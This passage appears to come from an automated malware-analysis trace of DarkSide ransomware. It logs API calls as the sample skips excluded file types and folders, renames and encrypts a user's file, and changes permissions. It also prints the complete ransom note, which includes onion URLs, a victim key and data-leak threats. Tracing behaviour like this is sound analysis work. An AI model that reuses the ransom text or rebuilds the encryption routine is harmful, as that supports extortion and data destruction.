_wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0148.156] wcslen (_String="nomedia") returned 0x7 [0148.156] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0148.156] wcslen (_String="ocx") returned 0x3 [0148.156] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0148.156] wcslen (_String="prf") returned 0x3 [0148.156] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0148.156] wcslen (_String="ps1") returned 0x3 [0148.156] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0148.156] wcslen (_String="rom") returned 0x3 [0148.156] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0148.156] wcslen (_String="rtp") returned 0x3 [0148.156] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0148.156] wcslen (_String="scr") returned 0x3 [0148.156] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0148.156] wcslen (_String="shs") returned 0x3 [0148.156] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0148.156] wcslen (_String="spl") returned 0x3 [0148.156] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0148.156] wcslen (_String="sys") returned 0x3 [0148.156] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0148.156] wcslen (_String="theme") returned 0x5 [0148.156] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0148.156] wcslen (_String="themepack") returned 0x9 [0148.156] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0148.156] wcslen (_String="wpx") returned 0x3 [0148.156] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0148.156] wcslen (_String="lock") returned 0x4 [0148.156] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0148.156] wcslen (_String="key") returned 0x3 [0148.156] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0148.156] wcslen (_String="hta") returned 0x3 [0148.157] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0148.157] wcslen (_String="msi") returned 0x3 [0148.157] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0148.157] wcslen (_String="pdb") returned 0x3 [0148.157] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0148.157] wcslen (_String="sql") returned 0x3 [0148.157] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0148.157] wcslen (_String="sqlite") returned 0x6 [0148.157] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0148.157] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.157] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0148.157] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned 0x35 [0148.157] wcscpy (in: _Dest=0x45000fc, _Source="SsS1Qlj0VTcoohhkUWi.pptx" | out: _Dest="SsS1Qlj0VTcoohhkUWi.pptx") returned="SsS1Qlj0VTcoohhkUWi.pptx" [0148.157] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx", dwFileAttributes=0x80) returned 1 [0148.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\sss1qlj0vtcoohhkuwi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0148.162] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.162] ReadFile (in: hFile=0x644, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.163] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x473edde0 [0148.163] RtlComputeCrc32 (PartialCrc=0xdde0, Buffer=0x3fe8f4, Length=0x80) returned 0x25659be9 [0148.163] RtlComputeCrc32 (PartialCrc=0x9be9, Buffer=0x3fe8f4, Length=0x80) returned 0x85f193b9 [0148.163] RtlComputeCrc32 (PartialCrc=0x93b9, Buffer=0x3fe8f4, Length=0x80) returned 0xe66ae65e [0148.163] RtlComputeCrc32 (PartialCrc=0xe65e, Buffer=0x3fe8f4, Length=0x80) returned 0x95cd9c0c [0148.163] CloseHandle (hObject=0x644) returned 1 [0148.163] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.163] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx" [0148.163] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx") returned 0x4e [0148.163] wcscpy (in: _Dest=0x4510134, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.163] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\sss1qlj0vtcoohhkuwi.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\sss1qlj0vtcoohhkuwi.pptx.c06622a1"), dwFlags=0x8) returned 1 [0148.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\SsS1Qlj0VTcoohhkUWi.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\sss1qlj0vtcoohhkuwi.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0148.173] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.173] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x721fed55 [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x183ca69e [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a77e534 [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ab5e916 [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4bbc48a4 [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78dd46fd [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b16520 [0148.178] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b70c551 [0148.181] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xbe692f6d [0148.181] RtlComputeCrc32 (PartialCrc=0x2f6d, Buffer=0x2f30094, Length=0x80) returned 0x6b3bc8a2 [0148.182] RtlComputeCrc32 (PartialCrc=0xc8a2, Buffer=0x2f30094, Length=0x80) returned 0x248c9a0e [0148.182] RtlComputeCrc32 (PartialCrc=0x9a0e, Buffer=0x2f30094, Length=0x80) returned 0xeef88f03 [0148.182] RtlComputeCrc32 (PartialCrc=0x8f03, Buffer=0x2f30094, Length=0x80) returned 0x6b3859fd [0148.182] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.182] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.182] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.182] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea173c50, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0x296206b0, ftLastAccessTime.dwHighDateTime=0x1d5e060, ftLastWriteTime.dwLowDateTime=0x296206b0, ftLastWriteTime.dwHighDateTime=0x1d5e060, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TJ6EEdNAUO4l9hn", cAlternateFileName="TJ6EED~1")) returned 1 [0148.182] _wcsicmp (_Str1="$recycle.bin", _Str2="TJ6EEdNAUO4l9hn") returned -80 [0148.182] wcslen (_String="$recycle.bin") returned 0xc [0148.182] _wcsicmp (_Str1="config.msi", _Str2="TJ6EEdNAUO4l9hn") returned -17 [0148.182] wcslen (_String="config.msi") returned 0xa [0148.182] _wcsicmp (_Str1="$windows.~bt", _Str2="TJ6EEdNAUO4l9hn") returned -80 [0148.182] wcslen (_String="$windows.~bt") returned 0xc [0148.182] _wcsicmp (_Str1="$windows.~ws", _Str2="TJ6EEdNAUO4l9hn") returned -80 [0148.182] wcslen (_String="$windows.~ws") returned 0xc [0148.182] _wcsicmp (_Str1="windows", _Str2="TJ6EEdNAUO4l9hn") returned 3 [0148.182] wcslen (_String="windows") returned 0x7 [0148.182] _wcsicmp (_Str1="appdata", _Str2="TJ6EEdNAUO4l9hn") returned -19 [0148.182] wcslen (_String="appdata") returned 0x7 [0148.182] _wcsicmp (_Str1="application data", _Str2="TJ6EEdNAUO4l9hn") returned -19 [0148.182] wcslen (_String="application data") returned 0x10 [0148.182] _wcsicmp (_Str1="boot", _Str2="TJ6EEdNAUO4l9hn") returned -18 [0148.182] wcslen (_String="boot") returned 0x4 [0148.182] _wcsicmp (_Str1="google", _Str2="TJ6EEdNAUO4l9hn") returned -13 [0148.182] wcslen (_String="google") returned 0x6 [0148.182] _wcsicmp (_Str1="mozilla", _Str2="TJ6EEdNAUO4l9hn") returned -7 [0148.182] wcslen (_String="mozilla") returned 0x7 [0148.182] _wcsicmp (_Str1="program files", _Str2="TJ6EEdNAUO4l9hn") returned -4 [0148.182] wcslen (_String="program files") returned 0xd [0148.182] _wcsicmp (_Str1="program files (x86)", _Str2="TJ6EEdNAUO4l9hn") returned -4 [0148.182] wcslen (_String="program files (x86)") returned 0x13 [0148.182] _wcsicmp (_Str1="programdata", _Str2="TJ6EEdNAUO4l9hn") returned -4 [0148.182] wcslen (_String="programdata") returned 0xb [0148.182] _wcsicmp (_Str1="system volume information", _Str2="TJ6EEdNAUO4l9hn") returned -1 [0148.183] wcslen (_String="system volume information") returned 0x19 [0148.183] _wcsicmp (_Str1="tor browser", _Str2="TJ6EEdNAUO4l9hn") returned 5 [0148.183] wcslen (_String="tor browser") returned 0xb [0148.183] _wcsicmp (_Str1="windows.old", _Str2="TJ6EEdNAUO4l9hn") returned 3 [0148.183] wcslen (_String="windows.old") returned 0xb [0148.183] _wcsicmp (_Str1="intel", _Str2="TJ6EEdNAUO4l9hn") returned -11 [0148.183] wcslen (_String="intel") returned 0x5 [0148.183] _wcsicmp (_Str1="msocache", _Str2="TJ6EEdNAUO4l9hn") returned -7 [0148.183] wcslen (_String="msocache") returned 0x8 [0148.183] _wcsicmp (_Str1="perflogs", _Str2="TJ6EEdNAUO4l9hn") returned -4 [0148.183] wcslen (_String="perflogs") returned 0x8 [0148.183] _wcsicmp (_Str1="x64dbg", _Str2="TJ6EEdNAUO4l9hn") returned 4 [0148.183] wcslen (_String="x64dbg") returned 0x6 [0148.183] _wcsicmp (_Str1="public", _Str2="TJ6EEdNAUO4l9hn") returned -4 [0148.183] wcslen (_String="public") returned 0x6 [0148.183] _wcsicmp (_Str1="all users", _Str2="TJ6EEdNAUO4l9hn") returned -19 [0148.183] wcslen (_String="all users") returned 0x9 [0148.183] _wcsicmp (_Str1="default", _Str2="TJ6EEdNAUO4l9hn") returned -16 [0148.183] wcslen (_String="default") returned 0x7 [0148.183] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*" [0148.183] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*") returned 0x37 [0148.183] wcscpy (in: _Dest=0x44e00ec, _Source="TJ6EEdNAUO4l9hn" | out: _Dest="TJ6EEdNAUO4l9hn") returned="TJ6EEdNAUO4l9hn" [0148.183] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.184] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.184] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" [0148.184] GetNamedSecurityInfoW () returned 0x0 [0148.184] SetEntriesInAclW () returned 0x0 [0148.184] SetNamedSecurityInfoW () returned 0x0 [0148.192] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57298) returned 1 [0148.192] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0148.192] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 1 [0148.192] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0148.192] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0148.193] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0148.194] CloseHandle (hObject=0x1c) returned 1 [0148.194] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0148.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 0x10 [0148.194] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\") returned="" [0148.194] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\") returned 0x46 [0148.194] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0148.194] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea173c50, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0xd6f1ac00, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6f1ac00, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.194] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88445d70, ftCreationTime.dwHighDateTime=0x1d5e486, ftLastAccessTime.dwLowDateTime=0xfe5036a0, ftLastAccessTime.dwHighDateTime=0x1d5d992, ftLastWriteTime.dwLowDateTime=0xfe5036a0, ftLastWriteTime.dwHighDateTime=0x1d5d992, nFileSizeHigh=0x0, nFileSizeLow=0x583d, dwReserved0=0x0, dwReserved1=0x0, cFileName="1vBK_M.csv", cAlternateFileName="")) returned 1 [0148.194] _wcsicmp (_Str1="1vBK_M.csv", _Str2="README.c06622a1.TXT") returned -65 [0148.194] wcsstr (_Str="1vBK_M.csv", _SubStr="README") returned 0x0 [0148.194] _wcsicmp (_Str1="autorun.inf", _Str2="1vBK_M.csv") returned 48 [0148.194] wcslen (_String="autorun.inf") returned 0xb [0148.194] _wcsicmp (_Str1="boot.ini", _Str2="1vBK_M.csv") returned 49 [0148.194] wcslen (_String="boot.ini") returned 0x8 [0148.194] _wcsicmp (_Str1="bootfont.bin", _Str2="1vBK_M.csv") returned 49 [0148.194] wcslen (_String="bootfont.bin") returned 0xc [0148.194] _wcsicmp (_Str1="bootsect.bak", _Str2="1vBK_M.csv") returned 49 [0148.194] wcslen (_String="bootsect.bak") returned 0xc [0148.194] _wcsicmp (_Str1="desktop.ini", _Str2="1vBK_M.csv") returned 51 [0148.194] wcslen (_String="desktop.ini") returned 0xb [0148.195] _wcsicmp (_Str1="iconcache.db", _Str2="1vBK_M.csv") returned 56 [0148.195] wcslen (_String="iconcache.db") returned 0xc [0148.195] _wcsicmp (_Str1="ntldr", _Str2="1vBK_M.csv") returned 61 [0148.195] wcslen (_String="ntldr") returned 0x5 [0148.195] _wcsicmp (_Str1="ntuser.dat", _Str2="1vBK_M.csv") returned 61 [0148.195] wcslen (_String="ntuser.dat") returned 0xa [0148.195] _wcsicmp (_Str1="ntuser.dat.log", _Str2="1vBK_M.csv") returned 61 [0148.195] wcslen (_String="ntuser.dat.log") returned 0xe [0148.195] _wcsicmp (_Str1="ntuser.ini", _Str2="1vBK_M.csv") returned 61 [0148.195] wcslen (_String="ntuser.ini") returned 0xa [0148.195] _wcsicmp (_Str1="thumbs.db", _Str2="1vBK_M.csv") returned 67 [0148.195] wcslen (_String="thumbs.db") returned 0x9 [0148.195] _wcsicmp (_Str1="386", _Str2="csv") returned -48 [0148.195] wcslen (_String="386") returned 0x3 [0148.195] _wcsicmp (_Str1="adv", _Str2="csv") returned -2 [0148.195] wcslen (_String="adv") returned 0x3 [0148.195] _wcsicmp (_Str1="ani", _Str2="csv") returned -2 [0148.195] wcslen (_String="ani") returned 0x3 [0148.195] _wcsicmp (_Str1="bat", _Str2="csv") returned -1 [0148.195] wcslen (_String="bat") returned 0x3 [0148.195] _wcsicmp (_Str1="bin", _Str2="csv") returned -1 [0148.195] wcslen (_String="bin") returned 0x3 [0148.195] _wcsicmp (_Str1="cab", _Str2="csv") returned -18 [0148.195] wcslen (_String="cab") returned 0x3 [0148.195] _wcsicmp (_Str1="cmd", _Str2="csv") returned -6 [0148.195] wcslen (_String="cmd") returned 0x3 [0148.195] _wcsicmp (_Str1="com", _Str2="csv") returned -4 [0148.195] wcslen (_String="com") returned 0x3 [0148.195] _wcsicmp (_Str1="cpl", _Str2="csv") returned -3 [0148.195] wcslen (_String="cpl") returned 0x3 [0148.195] _wcsicmp (_Str1="cur", _Str2="csv") returned 2 [0148.195] wcslen (_String="cur") returned 0x3 [0148.195] _wcsicmp (_Str1="deskthemepack", _Str2="csv") returned 1 [0148.195] wcslen (_String="deskthemepack") returned 0xd [0148.195] _wcsicmp (_Str1="diagcab", _Str2="csv") returned 1 [0148.195] wcslen (_String="diagcab") returned 0x7 [0148.195] _wcsicmp (_Str1="diagcfg", _Str2="csv") returned 1 [0148.195] wcslen (_String="diagcfg") returned 0x7 [0148.195] _wcsicmp (_Str1="diagpkg", _Str2="csv") returned 1 [0148.196] wcslen (_String="diagpkg") returned 0x7 [0148.196] _wcsicmp (_Str1="dll", _Str2="csv") returned 1 [0148.196] wcslen (_String="dll") returned 0x3 [0148.196] _wcsicmp (_Str1="drv", _Str2="csv") returned 1 [0148.196] wcslen (_String="drv") returned 0x3 [0148.196] _wcsicmp (_Str1="exe", _Str2="csv") returned 2 [0148.196] wcslen (_String="exe") returned 0x3 [0148.196] _wcsicmp (_Str1="hlp", _Str2="csv") returned 5 [0148.196] wcslen (_String="hlp") returned 0x3 [0148.196] _wcsicmp (_Str1="icl", _Str2="csv") returned 6 [0148.196] wcslen (_String="icl") returned 0x3 [0148.196] _wcsicmp (_Str1="icns", _Str2="csv") returned 6 [0148.196] wcslen (_String="icns") returned 0x4 [0148.196] _wcsicmp (_Str1="ico", _Str2="csv") returned 6 [0148.196] wcslen (_String="ico") returned 0x3 [0148.196] _wcsicmp (_Str1="ics", _Str2="csv") returned 6 [0148.196] wcslen (_String="ics") returned 0x3 [0148.196] _wcsicmp (_Str1="idx", _Str2="csv") returned 6 [0148.196] wcslen (_String="idx") returned 0x3 [0148.196] _wcsicmp (_Str1="ldf", _Str2="csv") returned 9 [0148.196] wcslen (_String="ldf") returned 0x3 [0148.196] _wcsicmp (_Str1="lnk", _Str2="csv") returned 9 [0148.196] wcslen (_String="lnk") returned 0x3 [0148.196] _wcsicmp (_Str1="mod", _Str2="csv") returned 10 [0148.196] wcslen (_String="mod") returned 0x3 [0148.196] _wcsicmp (_Str1="mpa", _Str2="csv") returned 10 [0148.196] wcslen (_String="mpa") returned 0x3 [0148.196] _wcsicmp (_Str1="msc", _Str2="csv") returned 10 [0148.196] wcslen (_String="msc") returned 0x3 [0148.196] _wcsicmp (_Str1="msp", _Str2="csv") returned 10 [0148.196] wcslen (_String="msp") returned 0x3 [0148.196] _wcsicmp (_Str1="msstyles", _Str2="csv") returned 10 [0148.196] wcslen (_String="msstyles") returned 0x8 [0148.196] _wcsicmp (_Str1="msu", _Str2="csv") returned 10 [0148.196] wcslen (_String="msu") returned 0x3 [0148.196] _wcsicmp (_Str1="nls", _Str2="csv") returned 11 [0148.196] wcslen (_String="nls") returned 0x3 [0148.196] _wcsicmp (_Str1="nomedia", _Str2="csv") returned 11 [0148.197] wcslen (_String="nomedia") returned 0x7 [0148.197] _wcsicmp (_Str1="ocx", _Str2="csv") returned 12 [0148.197] wcslen (_String="ocx") returned 0x3 [0148.197] _wcsicmp (_Str1="prf", _Str2="csv") returned 13 [0148.197] wcslen (_String="prf") returned 0x3 [0148.197] _wcsicmp (_Str1="ps1", _Str2="csv") returned 13 [0148.197] wcslen (_String="ps1") returned 0x3 [0148.197] _wcsicmp (_Str1="rom", _Str2="csv") returned 15 [0148.197] wcslen (_String="rom") returned 0x3 [0148.197] _wcsicmp (_Str1="rtp", _Str2="csv") returned 15 [0148.197] wcslen (_String="rtp") returned 0x3 [0148.197] _wcsicmp (_Str1="scr", _Str2="csv") returned 16 [0148.197] wcslen (_String="scr") returned 0x3 [0148.197] _wcsicmp (_Str1="shs", _Str2="csv") returned 16 [0148.197] wcslen (_String="shs") returned 0x3 [0148.197] _wcsicmp (_Str1="spl", _Str2="csv") returned 16 [0148.197] wcslen (_String="spl") returned 0x3 [0148.197] _wcsicmp (_Str1="sys", _Str2="csv") returned 16 [0148.197] wcslen (_String="sys") returned 0x3 [0148.197] _wcsicmp (_Str1="theme", _Str2="csv") returned 17 [0148.197] wcslen (_String="theme") returned 0x5 [0148.197] _wcsicmp (_Str1="themepack", _Str2="csv") returned 17 [0148.197] wcslen (_String="themepack") returned 0x9 [0148.197] _wcsicmp (_Str1="wpx", _Str2="csv") returned 20 [0148.197] wcslen (_String="wpx") returned 0x3 [0148.197] _wcsicmp (_Str1="lock", _Str2="csv") returned 9 [0148.197] wcslen (_String="lock") returned 0x4 [0148.197] _wcsicmp (_Str1="key", _Str2="csv") returned 8 [0148.197] wcslen (_String="key") returned 0x3 [0148.197] _wcsicmp 